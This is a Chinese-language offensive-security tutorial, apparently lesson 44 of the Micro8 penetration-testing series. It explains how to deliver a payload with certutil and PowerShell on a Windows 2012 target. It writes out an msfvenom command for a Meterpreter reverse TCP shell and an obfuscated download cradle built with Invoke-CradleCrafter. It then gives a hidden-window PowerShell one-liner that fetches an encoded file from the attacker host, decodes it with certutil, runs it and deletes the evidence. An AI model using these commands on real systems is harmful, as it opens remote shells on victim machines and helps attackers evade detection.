> For the complete documentation index, see [llms.txt](https://micro8.gitbook.io/micro8/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://micro8.gitbook.io/micro8/contents-1/41-50/44ertutil-yi-ju-hua-xia-zai-payload-bu-chong.md).

# 第四十四课：ertutil一句话下载payload补充

第八季中提到了 certutil 的加密与解密。

```bash
C:\>certutil -encode c:\downfile.vbs downfile.bat
```

而配合 powershell 的内存加载，则可把 certutil 发挥更强大。

**靶机：windows 2012**

而今天需要的是一款 powershell 的混淆框架的配合\
<https://github.com/danielbohannon/Invoke-CradleCrafter>

使用方法：

```bash
Import-Module ./Invoke-CradleCrafter.psd1 Invoke-CradleCrafter
```

![](/files/-LZJwsPpZUj5YNm9IAZ2)

![](/files/-LZJwsPrtqmvAVFp9Gsa)

如果在加载 powershell 脚本的时候提示：**powershell 进行数字签运行该脚本。** 则先执行：

```bash
set-executionpolicy Bypass
```

生成payload：（有关生成payload，会在未来的系列中讲到）

```bash
root@John:/tmp# msfvenom ‐p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=53 ‐e cmd/powershell_base64 ‐f psh ‐o Micropoor.txt
```

![](/files/-LZJwsPtOwDDDWVo7tOP)

![](/files/-LZJwsPvg1dFvXKOe0Mv)

**启动apache：**\
![](/files/-LZJwsPx039TRnJZH_0v)

**powershell框架设置：**

SET URL <http://192.168.1.5/Micropoor.txt>\
![](/files/-LZJwsPzE5Vq7jUAzJe9)

**MEMORY**\
![](/files/-LZJwsQ0hmogCGU_ZSFl)

**CERTUTIL**\
![](/files/-LZJwsQ2LN6YM_7uJ1J1)

**ALL**\
![](/files/-LZJwsQ4BqYFKQhF1bvD)

**1**\
![](/files/-LZJwsQ6snDobc5LO3Oj)

**混淆内容保存txt，后进行encode**\
![](/files/-LZJwsQ8yOlLQ60HeJ_g)

把 cer.cer 与 Micropoo.txt 放置同一目录下。

**目标机执行：**

```bash
powershell.exe ‐Win hiddeN ‐Exec ByPasS add‐content ‐path %APPDATA%\\cer.cer (New‐Object Net.WebClient).DownloadString('http://192.168.1.5/cer.cer'); certutil ‐decode %APPDATA%\cer.cer %APPDATA%\stage.ps1 & start /b cmd /c powershell.exe ‐Exec Bypass ‐NoExit ‐File %APPDATA%\stage.ps1 & start /b cmd /c del %APPDATA%\cer.cer
```

> Micropoor
